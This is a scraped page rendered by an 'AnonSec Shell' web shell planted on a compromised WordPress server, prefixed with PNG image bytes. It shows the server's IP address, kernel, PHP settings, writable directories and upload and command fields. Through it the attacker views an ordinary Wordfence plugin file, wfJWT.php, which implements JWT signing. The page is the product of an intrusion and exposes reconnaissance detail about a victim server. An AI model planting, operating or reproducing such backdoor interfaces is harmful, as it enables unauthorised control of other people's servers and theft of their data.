‰PNG  IHDR 3 ( S°Âr 7iCCPsRGB IEC61966-2.1 xœ–wTSهϽ7½P’Š”ÐkhRH ½H‘.*1 JÀ "6DTpDQ‘¦2(à€£C‘±"Š…Q±ëDÔqp–Id­ß¼yïÍ›ß÷~kŸ½ÏÝgï}Öº üƒÂLX € ¡Xáçň‹g` ð l àp³³BøF™|ØŒl™ø½º ùû*Ó?ŒÁ ÿŸ”¹Y"1 P˜ŒçòøÙ\É8=Wœ%·Oɘ¶4MÎ0JÎ"Y‚2V“sò,[|ö™e9ó2„<ËsÎâeðäÜ'ã9¾Œ‘`çø¹2¾&cƒtI†@Æoä±|N6 (’Ü.æsSdl-c’(2‚-ãy àHÉ_ðÒ/XÌÏËÅÎÌZ.$§ˆ&\S†“‹áÏÏMç‹ÅÌ07#â1Ø™Yár fÏüYym²";Ø8980m-m¾(Ô]ü›’÷v–^„îDøÃöW~™ °¦eµÙú‡mi ]ëP»ý‡Í`/ в¾u}qº|^RÄâ,g+«ÜÜ\KŸk)/èïúŸC_|ÏR¾Ýïåaxó“8’t1C^7nfz¦DÄÈÎâpù 柇øþuü$¾ˆ/”ED˦L L–µ[Ȉ™B†@øŸšøÃþ¤Ù¹–‰ÚøЖX¥!@~ (* {d+Ðï} ÆGù͋љ˜ûÏ‚þ}W¸LþÈ$ŽcGD2¸QÎìšüZ4 E@ê@èÀ¶À¸ àA(ˆq`1à‚D €µ ”‚­`'¨u 4ƒ6ptcà48.Ë`ÜR0ž€)ð Ì@„…ÈR‡t CȲ…XäCP”%CBH@ë R¨ª†ê¡fè[è(tº C· Qhúz#0 ¦ÁZ°l³`O8Ž„ÁÉð28.‚·À•p|î„O×àX ?§€:¢‹0ÂFB‘x$ !«¤i@ڐ¤¹ŠH‘§È[EE1PL” Ê…⢖¡V¡6£ªQP¨>ÔUÔ(j õMFk¢ÍÑÎè t,:‹.FW ›Ðè³èô8úƒ¡cŒ1ŽL&³³³ÓŽ9…ÆŒa¦±X¬:ÖëŠ År°bl1¶ {{{;Ž}ƒ#âtp¶8_\¡8áú"ãEy‹.,ÖXœ¾øøÅ%œ%Gщ1‰-‰ï9¡œÎôÒ€¥µK§¸lî.îžoo’ïÊ/çO$¹&•'=JvMÞž<™âžR‘òTÀT ž§ú§Ö¥¾N MÛŸö)=&½=—‘˜qTH¦ û2µ3ó2‡³Ì³Š³¤Ëœ—í\6% 5eCÙ‹²»Å4ÙÏÔ€ÄD²^2šã–S“ó&7:÷Hžrž0o`¹ÙòMË'ò}ó¿^ZÁ]Ñ[ [°¶`t¥çÊúUЪ¥«zWë¯.Z=¾Æóµ„µik(´.,/|¹.f]O‘VÑš¢±õ~ë[‹ŠEÅ76¸l¨ÛˆÚ(Ø8¸iMKx%K­K+Jßoæn¾ø•ÍW•_}Ú’´e°Ì¡lÏVÌVáÖëÛÜ·(W.Ï/Û²½scGÉŽ—;—ì¼PaWQ·‹°K²KZ\Ù]ePµµê}uJõHWM{­fí¦Ú×»y»¯ìñØÓV§UWZ÷n¯`ïÍz¿úΣ†Š}˜}9û6F7öÍúº¹I£©´éÃ~á~遈}ÍŽÍÍ-š-e­p«¤uò`ÂÁËßxÓÝÆl«o§·—‡$‡›øíõÃA‡{°Ž´}gø]mµ£¤ê\Þ9Õ•Ò%íŽë>x´·Ç¥§ã{Ëï÷Ó=Vs\åx٠‰¢ŸN柜>•uêééäÓc½Kz=s­/¼oðlÐÙóç|ϝé÷ì?yÞõü± ÎŽ^d]ìºäp©sÀ~ ãû:;‡‡º/;]îž7|âŠû•ÓW½¯ž»píÒÈü‘áëQ×oÞH¸!½É»ùèVú­ç·snÏÜYs}·äžÒ½Šûš÷~4ý±]ê =>ê=:ð`Áƒ;cܱ'?eÿô~¼è!ùaÅ„ÎDó#ÛGÇ&}'/?^øxüIÖ“™§Å?+ÿ\ûÌäÙw¿xü20;5þ\ôüÓ¯›_¨¿ØÿÒîeïtØôýW¯f^—¼Qsà-ëmÿ»˜w3¹ï±ï+?˜~èùôñî§ŒOŸ~÷„óûpf* pHYs  Ê&ó? ÉIDATxœí™mh[UÇo’Û·´iWi`×b;Ym­`p Œ¬­n¢8Dh7ýà‡²‰ƒ9Q?t²f-(¢›:?±(Žiˆ:W¦‚m†…Vi‰ö…®±)KÚ4ñwºÜr“Ü›·¶YÊú‡'çí9ç>ÿsžsÎsoäp8, ŒŽŽÔÖÖv †ç)>€äK·>äòòòr¯,Ë¿¥ÒA?@`g]]‹lÓFZ—&J&“é‰P(ôªÑh<“¬ƒì÷ûwüL~ûÆÛ—LxK„<ú"‘¢ ‘³RîY„ހ̗ ëé7{<‹6­÷ø|¾»HÿÑSd ³gÏÚÀþIh«œ-C²-2¹ŠÛ’ÌUä;ää²-î·ˆiDžBŒ:z7'2ŽØ"’28¢“ˆ`þ˜˜ø¡¦¦ÆŸ ™KCCCO[­Ö%Qà’íånú…ìŽXE>Ê]ðR&9@ù+ BóÁ`Ж——wUÕ÷C’#©’áÞy$Tª®®Å®G’’ᡯ+D Ç™•>y'Fõ1ÔyÚV+8J¿ÁÈÉ>£û‰šÈ »ùùN‹ÅÒ!º¥JH…Lð™¤d`<΃c«4TÇungFÝõØŠÒÒÒëÁeY2›t°?)™âââ}$Õu¬Ê^ Õ½^ï¶²²²9¥ÂétšÚÚÚöhè>ŠØÕxÀnV2S"–¤d0ü¾ÿ«óýððp^}}ýêžÑŒÙufÉG =* ò6õ÷jèîaúfffNVVVú ò0D>[‘¤r T²‰/ BÒÍwœD!Ek~~þ†zYQ‹¤’ ¯¨¨8*\ "åé­‡tî™Ò4tSu±×…ˆÀmyin l‘ÉUl‘ÉU2^)ó"«XZZšçBÖmdÞGNdÍ¢Ìq¥¤¤dFd¸Ä \âq©ÜÓÓs²««ËLþ%Đm SÄ_„Iϱ¯æææÄE]Èv»]Äì/³„Ÿ‹žVéf<•±PDŒZÉ"‚vî\ôx<ŽªªªJ¡ÒCZV ÉA’Džþ ¹_ç!"Ì¿ ùÞ©©©1‡ÃˆLÈ*º»»---“šžž···/‹¼xù‚HT;nv,! ÛÍfs£ÎsÜøê1Vð åÊC §!Šï¾6ÌÎΖ–——Ÿ&û¤V{™¢¢¢ýR¼‹‰§.—Ëu^™1Hµ1CÙú*6KDv“ë)Å‘aYÕ¯¸bv?fµNp’LCD­w7IÇúÙ»f£ÈD޼}‘â¯äãR¿C$®'{æk\M¼|åÊÅ;eÇŸø&€K= ‰ ‰¾¸sy]£ý+Ô»áf¦ lî"³¸¸8922²«¡¡aQý•E¬äiô&#„nÕß"bÂûÝn÷›Qd8¿'!’ÖHúhpp°¿©©©‘üe•(G´ú„iPJ~â1œá>ÒWs‹pø5Ü݉—ŒY­Öõñ÷Èw5÷zŒ¥¿ßïÀà·ÈŒi "J!W6oBÆüMrˆ©•ÕWŠü÷ʪ‰h圢·)È(0™L? Xm6Û‹9EÕ^m(Ȧ"#ÐÜÜ,öÚYŸÏ÷9{ÜÞÙÙ¹‹òŸ¢íº›|¬– IEND®B`‚ AnonSec Shell
AnonSec Shell
Server IP : 20.73.19.71  /  Your IP : 10.112.20.21
Web Server : nginx/1.15.12
System : Linux a10deea3d6b7 6.8.0-1044-azure #50~22.04.1-Ubuntu SMP Wed Dec 3 15:13:22 UTC 2025 x86_64
User :  ( 1000)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/upgrade/wordfence.7.9.1/wordfence/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /var/www/html/wp-content/upgrade/wordfence.7.9.1/wordfence/lib/wfJWT.php
<?php

class wfJWT {

	private $claims;
	const JWT_TTL = 600;
	const ISSUER = 600;

	public static function extractTokenContents($token) {
		if (!is_string($token)) {
			throw new InvalidArgumentException('Token is not a string. ' . gettype($token) . ' given.');
		}

		// Verify the token matches the JWT format.
		if (!preg_match('/^[a-zA-Z0-9\-_]+?\.[a-zA-Z0-9\-_]+?\.[a-zA-Z0-9\-_]+?$/', $token)) {
			throw new wfJWTException('Invalid token format.');
		}
		list($header, $body, $signature) = explode('.', $token);

		// Test that the token is valid and not expired.
		$decodedHeader = base64_decode($header);

		if (!(is_string($decodedHeader) && $decodedHeader)) {
			throw new wfJWTException('Token header is invalid.');
		}

		$header = json_decode($decodedHeader, true);
		if (!is_array($header)) {
			throw new wfJWTException('Token header is invalid.');
		}

		$decodedBody = base64_decode($body);

		if (!(is_string($decodedBody) && $decodedBody)) {
			throw new wfJWTException('Token body is invalid.');
		}

		$body = json_decode($decodedBody, true);
		if (!is_array($body)) {
			throw new wfJWTException('Token body is invalid.');
		}

		return array(
			'header'    => $header,
			'body'      => $body,
			'signature' => $signature,
		);

	}

	/**
	 * @param mixed $subject
	 */
	public function __construct($subject = null) {
		$this->claims = $this->getClaimDefaults();
		$this->claims['sub'] = $subject;
	}

	/**
	 * @return string
	 */
	public function encode() {
		$header = $this->encodeString($this->buildHeader());
		$body = $this->encodeString($this->buildBody());
		return sprintf('%s.%s.%s', $header, $body,
			$this->encodeString($this->sign(sprintf('%s.%s', $header, $body))));
	}

	/**
	 * @param string $token
	 * @return array
	 * @throws wfJWTException|InvalidArgumentException
	 */
	public function decode($token) {
		if (!is_string($token)) {
			throw new InvalidArgumentException('Token is not a string. ' . gettype($token) . ' given.');
		}

		// Verify the token matches the JWT format.
		if (!preg_match('/^[a-zA-Z0-9\-_]+?\.[a-zA-Z0-9\-_]+?\.[a-zA-Z0-9\-_]+?$/', $token)) {
			throw new wfJWTException('Invalid token format.');
		}
		list($header, $body, $signature) = explode('.', $token);

		// Verify signature matches the supplied payload.
		if (!$this->verifySignature($this->decodeString($signature), sprintf('%s.%s', $header, $body))) {
			throw new wfJWTException('Invalid signature.');
		}

		// Test that the token is valid and not expired.
		$decodedHeader = base64_decode($header);

		if (!(is_string($decodedHeader) && $decodedHeader)) {
			throw new wfJWTException('Token header is invalid.');
		}

		$header = json_decode($decodedHeader, true);
		if (!(
			is_array($header) &&
			array_key_exists('alg', $header) &&
			$header['alg'] === 'HS256' &&
			$header['typ'] === 'JWT'
		)) {
			throw new wfJWTException('Token header is invalid.');
		}

		$decodedBody = base64_decode($body);

		if (!(is_string($decodedBody) && $decodedBody)) {
			throw new wfJWTException('Token body is invalid.');
		}

		$body = json_decode($decodedBody, true);
		if (!(
			is_array($body) &&

			// Check the token not before now timestamp.
			array_key_exists('nbf', $body) &&
			is_numeric($body['nbf']) &&
			$body['nbf'] <= time() &&

			// Check the token is not expired.
			array_key_exists('exp', $body) &&
			is_numeric($body['exp']) &&
			$body['exp'] >= time() &&

			// Check the issuer and audience is ours.
			$body['iss'] === 'Wordfence ' . WORDFENCE_VERSION &&
			$body['aud'] === 'Wordfence Central'
		)) {
			throw new wfJWTException('Token is invalid or expired.');
		}

		return array(
			'header' => $header,
			'body'   => $body,
		);
	}

	/**
	 * @param string $string
	 * @return string
	 */
	public function sign($string) {
		$salt = wp_salt('auth');

		return hash_hmac('sha256', $string, $salt, true);
	}

	/**
	 * @param string $signature
	 * @param string $message
	 * @return bool
	 */
	public function verifySignature($signature, $message) {
		return hash_equals($this->sign($message), $signature);
	}

	/**
	 * @return string
	 */
	public function __toString() {
		return $this->encode();
	}

	/**
	 * @param string $data
	 * @return string
	 */
	public function encodeString($data) {
		return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
	}

	/**
	 * @param string $data
	 * @return bool|string
	 */
	public function decodeString($data) {
		return base64_decode(strtr($data, '-_', '+/'));
	}

	/**
	 * @return mixed|string
	 */
	protected function buildHeader() {
		return '{"alg":"HS256","typ":"JWT"}';
	}

	/**
	 * @return mixed|string
	 */
	protected function buildBody() {
		return json_encode($this->getClaims());
	}

	/**
	 * @return array
	 */
	protected function getClaimDefaults() {
		$now = time();
		return array(
			'iss' => 'Wordfence ' . WORDFENCE_VERSION,
			'aud' => 'Wordfence Central',
			'nbf' => $now,
			'iat' => $now,
			'exp' => $now + self::JWT_TTL,
		);
	}

	/**
	 * @param array $claims
	 */
	public function addClaims($claims) {
		if (!is_array($claims)) {
			throw new InvalidArgumentException(__METHOD__ . ' expects argument 1 to be array.');
		}
		$this->setClaims(array_merge($this->getClaims(), $claims));
	}

	/**
	 * @return array
	 */
	public function getClaims() {
		return $this->claims;
	}

	/**
	 * @param array $claims
	 */
	public function setClaims($claims) {
		$this->claims = $claims;
	}
}

class wfJWTException extends Exception {

}

Anon7 - 2022
AnonSec Team